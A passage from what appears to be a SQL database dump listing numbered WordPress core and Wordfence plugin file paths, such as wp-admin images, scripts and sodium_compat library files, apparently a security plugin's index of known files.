-admin/images/about-color-palette.svg'),(179,'wp-admin/images/about-header-brushes.svg'),(180,'wp-admin/images/align-center-2x.png'),(181,'wp-admin/images/align-center.png'),(182,'wp-admin/images/align-left-2x.png'),(183,'wp-admin/images/align-left.png'),(184,'wp-admin/images/align-none-2x.png'),(185,'wp-admin/images/align-none.png'),(186,'wp-admin/images/align-right-2x.png'),(187,'wp-admin/images/align-right.png'),(188,'wp-admin/images/arrows-2x.png'),(189,'wp-admin/images/arrows.png'),(190,'wp-admin/images/browser-rtl.png'),(191,'wp-admin/images/browser.png'),(192,'wp-admin/images/bubble_bg-2x.gif'),(193,'wp-admin/images/bubble_bg.gif'),(194,'wp-admin/images/comment-grey-bubble-2x.png'),(195,'wp-admin/images/comment-grey-bubble.png'),(196,'wp-admin/images/date-button-2x.gif'),(197,'wp-admin/images/date-button.gif'),(198,'wp-admin/images/freedoms.png'),(199,'wp-admin/images/generic.png'),(200,'wp-admin/images/icons32-2x.png'),(201,'wp-admin/images/icons32-vs-2x.png'),(202,'wp-admin/images/icons32-vs.png'),(203,'wp-admin/images/icons32.png'),(204,'wp-admin/images/imgedit-icons-2x.png'),(205,'wp-admin/images/imgedit-icons.png'),(206,'wp-admin/images/list-2x.png'),(207,'wp-admin/images/list.png'),(208,'wp-admin/images/loading.gif'),(209,'wp-admin/images/marker.png'),(210,'wp-admin/images/mask.png'),(211,'wp-admin/images/media-button-2x.png'),(212,'wp-admin/images/media-button-image.gif'),(213,'wp-admin/images/media-button-music.gif'),(214,'wp-admin/images/media-button-other.gif'),(215,'wp-admin/images/media-button-video.gif'),(216,'wp-admin/images/media-button.png'),(217,'wp-admin/images/menu-2x.png'),(218,'wp-admin/images/menu-vs-2x.png'),(219,'wp-admin/images/menu-vs.png'),(220,'wp-admin/images/menu.png'),(221,'wp-admin/images/no.png'),(222,'wp-admin/images/post-formats-vs.png'),(223,'wp-admin/images/post-formats.png'),(224,'wp-admin/images/post-formats32-vs.png'),(225,'wp-admin/images/post-formats32.png'),(226,'wp-admin/images/privacy.png'),(227,'wp-admin/images/resize-2x.gif'),(228,'wp-admin/images/resize-rtl-2x.gif'),(229,'wp-admin/images/resize-rtl.gif'),(230,'wp-admin/images/resize.gif'),(231,'wp-admin/images/se.png'),(232,'wp-admin/images/sort-2x.gif'),(233,'wp-admin/images/sort.gif'),(234,'wp-admin/images/spinner-2x.gif'),(235,'wp-admin/images/spinner.gif'),(236,'wp-admin/images/stars-2x.png'),(237,'wp-admin/images/stars.png'),(238,'wp-admin/images/w-logo-blue.png'),(239,'wp-admin/images/w-logo-white.png'),(240,'wp-admin/images/wheel.png'),(241,'wp-admin/images/wordpress-logo-white.svg'),(242,'wp-admin/images/wordpress-logo.png'),(243,'wp-admin/images/wordpress-logo.svg'),(244,'wp-admin/images/wpspin_light-2x.gif'),(245,'wp-admin/images/wpspin_light.gif'),(246,'wp-admin/images/xit-2x.gif'),(247,'wp-admin/images/xit.gif'),(248,'wp-admin/images/yes.png'),(249,'wp-admin/import.php'),(250,'wp-admin/includes/admin-filters.php'),(251,'wp-admin/includes/admin.php'),(252,'wp-admin/includes/ajax-actions.php'),(253,'wp-admin/includes/bookmark.php'),(254,'wp-admin/includes/class-automatic-upgrader-skin.php'),(255,'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),(256,'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),(257,'wp-admin/includes/class-bulk-upgrader-skin.php'),(258,'wp-admin/includes/class-core-upgrader.php'),(259,'wp-admin/includes/class-custom-background.php'),(260,'wp-admin/includes/class-custom-image-header.php'),(261,'wp-admin/includes/class-file-upload-upgrader.php'),(262,'wp-admin/includes/class-ftp-pure.php'),(263,'wp-admin/includes/class-ftp-sockets.php'),(264,'wp-admin/includes/class-ftp.php'),(265,'wp-admin/includes/class-language-pack-upgrader-skin.php'),(266,'wp-admin/includes/class-language-pack-upgrader.php'),(267,'wp-admin/includes/class-pclzip.php'),(268,'wp-admin/includes/class-plugin-installer-skin.php'),(269,'wp-admin/includes/class-plugin-upgrader-skin.php'),(270,'wp-admin/includes/class-plugin-upgrader.php'),(271,'wp-admin/includes/class-theme-installer-skin.php'),(272,'wp-admin/includes/class-theme-upgrader-skin.php'),(273,'wp-admin/includes/class-theme-upgrader.php'),(274,'wp-admin/includes/class-walker-category-checklist.php'),(275,'wp-admin/includes/class-walker-nav-menu-checklist.php'),(276,'wp-admin/includes/class-walker-nav-menu-edit.php'),(277,'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),(278,'wp-admin/includes/class-wp-application-passwords-list-table.php'),(279,'wp-admin/includes/class-wp-automatic-updater.php'),(280,'wp-admin/includes/class-wp-comments-list-table.php'),(281,'wp-admin/includes/class-wp-community-events.php'),(282,'wp-admin/includes/class-wp-debug-data.php'),(283,'wp-admin/includes/class-wp-filesystem-base.php'),(284,'wp-admin/includes/class-wp-filesystem-direct.php'),(285,'wp-admin/includes/class-wp-filesystem-ftpext.php'),(286,'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),(287,'wp-admin/includes/class-wp-filesystem-ssh2.php'),(288,'wp-admin/includes/class-wp-importer.php'),(289,'wp-admin/includes/class-wp-internal-pointers.php'),(290,'wp-admin/includes/class-wp-links-list-table.php'),(291,'wp-admin/includes/class-wp-list-table-compat.php'),(292,'wp-admin/includes/class-wp-list-table.php'),(293,'wp-admin/includes/class-wp-media-list-table.php'),(294,'wp-admin/includes/class-wp-ms-sites-list-table.php'),(295,'wp-admin/includes/class-wp-ms-themes-list-table.php'),(296,'wp-admin/includes/class-wp-ms-users-list-table.php'),(297,'wp-admin/includes/class-wp-plugin-install-list-table.php'),(298,'wp-admin/includes/class-wp-plugins-list-table.php'),(299,'wp-admin/includes/class-wp-post-comments-list-table.php'),(300,'wp-admin/includes/class-wp-posts-list-table.php'),(301,'wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php'),(302,'wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php'),(303,'wp-admin/includes/class-wp-privacy-policy-content.php'),(304,'wp-admin/includes/class-wp-privacy-requests-table.php'),(305,'wp-admin/includes/class-wp-screen.php'),(306,'wp-admin/includes/class-wp-site-health-auto-updates.php'),(307,'wp-admin/includes/class-wp-site-health.php'),(308,'wp-admin/includes/class-wp-site-icon.php'),(309,'wp-admin/includes/class-wp-terms-list-table.php'),(310,'wp-admin/includes/class-wp-theme-install-list-table.php'),(311,'wp-admin/includes/class-wp-themes-list-table.php'),(312,'wp-admin/includes/class-wp-upgrader-skin.php'),(313,'wp-admin/includes/class-wp-upgrader-skins.php'),(314,'wp-admin/includes/class-wp-upgrader.php'),(315,'wp-admin/includes/class-wp-users-list-table.php'),(316,'wp-admin/includes/comment.php'),(317,'wp-admin/includes/continents-cities.php'),(318,'wp-admin/includes/credits.php'),(319,'wp-admin/includes/dashboard.php'),(320,'wp-admin/includes/deprecated.php'),(321,'wp-admin/includes/edit-tag-messages.php'),(322,'wp-admin/includes/export.php'),(323,'wp-admin/includes/file.php'),(324,'wp-admin/includes/image-edit.php'),(325,'wp-admin/includes/image.php'),(326,'wp-admin/includes/import.php'),(327,'wp-admin/includes/list-table.php'),(328,'wp-admin/includes/media.php'),(329,'wp-admin/includes/menu.php'),(330,'wp-admin/includes/meta-boxes.php'),(331,'wp-admin/includes/misc.php'),(332,'wp-admin/includes/ms-admin-filters.php'),(333,'wp-admin/includes/ms-deprecated.php'),(334,'wp-admin/includes/ms.php'),(335,'wp-admin/includes/nav-menu.php'),(336,'wp-admin/includes/network.php'),(337,'wp-admin/includes/noop.php'),(338,'wp-admin/includes/options.php'),(339,'wp-admin/includes/plugin-install.php'),(340,'wp-admin/includes/plugin.php'),(341,'wp-admin/includes/post.php'),(342,'wp-admin/includes/privacy-tools.php'),(343,'wp-admin/includes/revision.php'),(344,'wp-admin/includes/schema.php'),(345,'wp-admin/includes/screen.php'),(346,'wp-admin/includes/taxonomy.php'),(347,'wp-admin/includes/template.php'),(348,'wp-admin/includes/theme-install.php'),(349,'wp-admin/includes/theme.php'),(350,'wp-admin/includes/translation-install.php'),(351,'wp-admin/includes/update-core.php'),(352,'wp-admin/includes/update.php'),(353,'wp-admin/includes/upgrade.php'),(354,'wp-admin/includes/user.php'),(355,'wp-admin/includes/widgets.php'),(356,'wp-admin/index.php'),(357,'wp-admin/install-helper.php'),(358,'wp-admin/install.php'),(359,'wp-admin/js/accordion.js'),(360,'wp-admin/js/accordion.min.js'),(361,'wp-admin/js/application-passwords.js'),(362,'wp-admin/js/application-passwords.min.js'),(363,'wp-admin/js/auth-app.js'),(364,'wp-admin/js/auth-app.min.js'),(365,'wp-admin/js/code-editor.js'),(366,'wp-admin/js/code-editor.min.js'),(367,'wp-admin/js/color-picker.js'),(368,'wp-admin/js/color-picker.min.js'),(369,'wp-admin/js/comment.js'),(370,'wp-admin/js/comment.min.js'),(371,'wp-admin/js/common.js'),(372,'wp-admin/js/common.min.js'),(373,'wp-admin/js/custom-background.js'),(374,'wp-admin/js/custom-background.min.js'),(375,'wp-admin/js/custom-header.js'),(376,'wp-admin/js/customize-controls.js'),(377,'wp-admin/js/customize-controls.min.js'),(378,'wp-admin/js/customize-nav-menus.js'),(379,'wp-admin/js/customize-nav-menus.min.js'),(380,'wp-admin/js/customize-widgets.js'),(381,'wp-admin/js/customize-widgets.min.js'),(382,'wp-admin/js/dashboard.js'),(383,'wp-admin/js/dashboard.min.js'),(384,'wp-admin/js/edit-comments.js'),(385,'wp-admin/js/edit-comments.min.js'),(386,'wp-admin/js/editor-expand.js'),(387,'wp-admin/js/editor-expand.min.js'),(388,'wp-admin/js/editor.js'),(389,'wp-admin/js/editor.min.js'),(390,'wp-admin/js/farbtastic.js'),(391,'wp-admin/js/gallery.js'),(392,'wp-admin/js/gallery.min.js'),(393,'wp-admin/js/image-edit.js'),(394,'wp-admin/js/image-edit.min.js'),(395,'wp-admin/js/inline-edit-post.js'),(396,'wp-admin/js/inline-edit-post.min.js'),(397,'wp-admin/js/inline-edit-tax.js'),(398,'wp-admin/js/inline-edit-tax.min.js'),(399,'wp-admin/js/iris.min.js'),(400,'wp-admin/js/language-chooser.js'),(401,'wp-admin/js/language-chooser.min.js'),(402,'wp-admin/js/link.js'),(403,'wp-admin/js/link.min.js'),(404,'wp-admin/js/media-gallery.js'),(405,'wp-admin/js/media-gallery.min.js'),(406,'wp-admin/js/media-upload.js'),(407,'wp-admin/js/media-upload.min.js'),(408,'wp-admin/js/media.js'),(409,'wp-admin/js/media.min.js'),(410,'wp-admin/js/nav-menu.js'),(411,'wp-admin/js/nav-menu.min.js'),(412,'wp-admin/js/password-strength-meter.js'),(413,'wp-admin/js/password-strength-meter.min.js'),(414,'wp-admin/js/plugin-install.js'),(415,'wp-admin/js/plugin-install.min.js'),(416,'wp-admin/js/post.js'),(417,'wp-admin/js/post.min.js'),(418,'wp-admin/js/postbox.js'),(419,'wp-admin/js/postbox.min.js'),(420,'wp-admin/js/privacy-tools.js'),(421,'wp-admin/js/privacy-tools.min.js'),(422,'wp-admin/js/revisions.js'),(423,'wp-admin/js/revisions.min.js'),(424,'wp-admin/js/set-post-thumbnail.js'),(425,'wp-admin/js/set-post-thumbnail.min.js'),(426,'wp-admin/js/site-health.js'),(427,'wp-admin/js/site-health.min.js'),(428,'wp-admin/js/svg-painter.js'),(429,'wp-admin/js/svg-painter.min.js'),(430,'wp-admin/js/tags-box.js'),(431,'wp-admin/js/tags-box.min.js'),(432,'wp-admin/js/tags-suggest.js'),(433,'wp-admin/js/tags-suggest.min.js'),(434,'wp-admin/js/tags.js'),(435,'wp-admin/js/tags.min.js'),(436,'wp-admin/js/theme-plugin-editor.js'),(437,'wp-admin/js/theme-plugin-editor.min.js'),(438,'wp-admin/js/theme.js'),(439,'wp-admin/js/theme.min.js'),(440,'wp-admin/js/updates.js'),(441,'wp-admin/js/updates.min.js'),(442,'wp-admin/js/user-profile.js'),(443,'wp-admin/js/user-profile.min.js'),(444,'wp-admin/js/user-suggest.js'),(445,'wp-admin/js/user-suggest.min.js'),(446,'wp-admin/js/widgets/custom-html-widgets.js'),(447,'wp-admin/js/widgets/custom-html-widgets.min.js'),(448,'wp-admin/js/widgets/media-audio-widget.js'),(449,'wp-admin/js/widgets/media-audio-widget.min.js'),(450,'wp-admin/js/widgets/media-gallery-widget.js'),(451,'wp-admin/js/widgets/media-gallery-widget.min.js'),(452,'wp-admin/js/widgets/media-image-widget.js'),(453,'wp-admin/js/widgets/media-image-widget.min.js'),(454,'wp-admin/js/widgets/media-video-widget.js'),(455,'wp-admin/js/widgets/media-video-widget.min.js'),(456,'wp-admin/js/widgets/media-widgets.js'),(457,'wp-admin/js/widgets/media-widgets.min.js'),(458,'wp-admin/js/widgets/text-widgets.js'),(459,'wp-admin/js/widgets/text-widgets.min.js'),(460,'wp-admin/js/widgets.js'),(461,'wp-admin/js/widgets.min.js'),(462,'wp-admin/js/word-count.js'),(463,'wp-admin/js/word-count.min.js'),(464,'wp-admin/js/xfn.js'),(465,'wp-admin/js/xfn.min.js'),(466,'wp-admin/link-add.php'),(467,'wp-admin/link-manager.php'),(468,'wp-admin/link-parse-opml.php'),(469,'wp-admin/link.php'),(470,'wp-admin/load-scripts.php'),(471,'wp-admin/load-styles.php'),(472,'wp-admin/maint/repair.php'),(473,'wp-admin/media-new.php'),(474,'wp-admin/media-upload.php'),(475,'wp-admin/media.php'),(476,'wp-admin/menu-header.php'),(477,'wp-admin/menu.php'),(478,'wp-admin/moderation.php'),(479,'wp-admin/ms-admin.php'),(480,'wp-admin/ms-delete-site.php'),(481,'wp-admin/ms-edit.php'),(482,'wp-admin/ms-options.php'),(483,'wp-admin/ms-sites.php'),(484,'wp-admin/ms-themes.php'),(485,'wp-admin/ms-upgrade-network.php'),(486,'wp-admin/ms-users.php'),(487,'wp-admin/my-sites.php'),(488,'wp-admin/nav-menus.php'),(489,'wp-admin/network/about.php'),(490,'wp-admin/network/admin.php'),(491,'wp-admin/network/credits.php'),(492,'wp-admin/network/edit.php'),(493,'wp-admin/network/freedoms.php'),(494,'wp-admin/network/index.php'),(495,'wp-admin/network/menu.php'),(496,'wp-admin/network/plugin-editor.php'),(497,'wp-admin/network/plugin-install.php'),(498,'wp-admin/network/plugins.php'),(499,'wp-admin/network/privacy.php'),(500,'wp-admin/network/profile.php'),(501,'wp-admin/network/settings.php'),(502,'wp-admin/network/setup.php'),(503,'wp-admin/network/site-info.php'),(504,'wp-admin/network/site-new.php'),(505,'wp-admin/network/site-settings.php'),(506,'wp-admin/network/site-themes.php'),(507,'wp-admin/network/site-users.php'),(508,'wp-admin/network/sites.php'),(509,'wp-admin/network/theme-editor.php'),(510,'wp-admin/network/theme-install.php'),(511,'wp-admin/network/themes.php'),(512,'wp-admin/network/update-core.php'),(513,'wp-admin/network/update.php'),(514,'wp-admin/network/upgrade.php'),(515,'wp-admin/network/user-edit.php'),(516,'wp-admin/network/user-new.php'),(517,'wp-admin/network/users.php'),(518,'wp-admin/network.php'),(519,'wp-admin/object-cache.php'),(520,'wp-admin/options-discussion.php'),(521,'wp-admin/options-general.php'),(522,'wp-admin/options-head.php'),(523,'wp-admin/options-media.php'),(524,'wp-admin/options-permalink.php'),(525,'wp-admin/options-privacy.php'),(526,'wp-admin/options-reading.php'),(527,'wp-admin/options-writing.php'),(528,'wp-admin/options.php'),(529,'wp-admin/plugin-editor.php'),(530,'wp-admin/plugin-install.php'),(531,'wp-admin/plugins.php'),(532,'wp-admin/post-new.php'),(533,'wp-admin/post.php'),(534,'wp-admin/press-this.php'),(535,'wp-admin/privacy-policy-guide.php'),(536,'wp-admin/privacy.php'),(537,'wp-admin/profile.php'),(538,'wp-admin/revision.php'),(539,'wp-admin/setup-config.php'),(540,'wp-admin/site-health-info.php'),(541,'wp-admin/site-health.php'),(542,'wp-admin/term.php'),(543,'wp-admin/theme-editor.php'),(544,'wp-admin/theme-install.php'),(545,'wp-admin/themes.php'),(546,'wp-admin/tools.php'),(547,'wp-admin/update-core.php'),(548,'wp-admin/update.php'),(549,'wp-admin/upgrade-functions.php'),(550,'wp-admin/upgrade.php'),(551,'wp-admin/upload.php'),(552,'wp-admin/user/about.php'),(553,'wp-admin/user/admin.php'),(554,'wp-admin/user/credits.php'),(555,'wp-admin/user/freedoms.php'),(556,'wp-admin/user/index.php'),(557,'wp-admin/user/menu.php'),(558,'wp-admin/user/privacy.php'),(559,'wp-admin/user/profile.php'),(560,'wp-admin/user/user-edit.php'),(561,'wp-admin/user-edit.php'),(562,'wp-admin/user-new.php'),(563,'wp-admin/users.php'),(564,'wp-admin/widgets.php'),(565,'wp-admin/wpimages.php'),(566,'wp-blog-header.php'),(567,'wp-comments-post.php'),(568,'wp-config-sample.php'),(569,'wp-config.php'),(570,'wp-content/index.php'),(571,'wp-content/plugins/wordfence/crypto/vendor/autoload.php'),(572,'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php'),(573,'wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php'),(574,'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE'),(575,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php'),(576,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php'),(577,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php'),(578,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php'),(579,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php'),(580,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php'),(581,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json'),(582,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.php'),(583,'wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php'),(584,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE'),(585,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey'),(586,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc'),(587,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php'),(588,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php'),(589,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php'),(590,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php'),(591,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php'),(592,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php'),(593,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php'),(594,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php'),(595,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php'),(596,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php'),(597,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php'),(598,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE'),(599,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php'),(600,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php'),(601,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php'),(602,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php'),(603,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php'),(604,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json'),(605,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php'),(606,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php'),(607,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php'),(608,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php'),(609,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php'),(610,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php'),(611,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php'),(612,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(613,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(614,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php'),(615,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(616,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(617,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(618,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(619,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(620,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(621,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php'),(622,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php'),(623,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php'),(624,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php'),(625,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php'),(626,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php'),(627,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php'),(628,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php'),(629,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php'),(630,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php'),(631,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php'),(632,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php'),(633,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php'),(634,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php'),(635,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php'),(636,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml'),(637,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml'),(638,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php'),(639,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php'),(640,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php'),(641,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php'),(642,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php'),(643,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php'),(644,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(645,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php'),(646,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php'),(647,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(648,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(649,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(650,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(651,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(652,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),(653,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),(654,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),(655,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),(656,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),(657,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),(658,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),(659,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),(660,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php'),(661,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),(662,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),(663,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),(664,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),(665,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),(666,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),(667,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(668,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(669,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php'),(670,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(671,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(672,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(673,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(674,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(675,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(676,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(677,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(678,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(679,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(680,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(681,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(682,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(683,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(684,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(685,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(686,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php'),(687,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(688,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(689,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(690,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(691,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(692,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(693,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(694,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(695,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php'),(696,'wp-content/plugins/wordf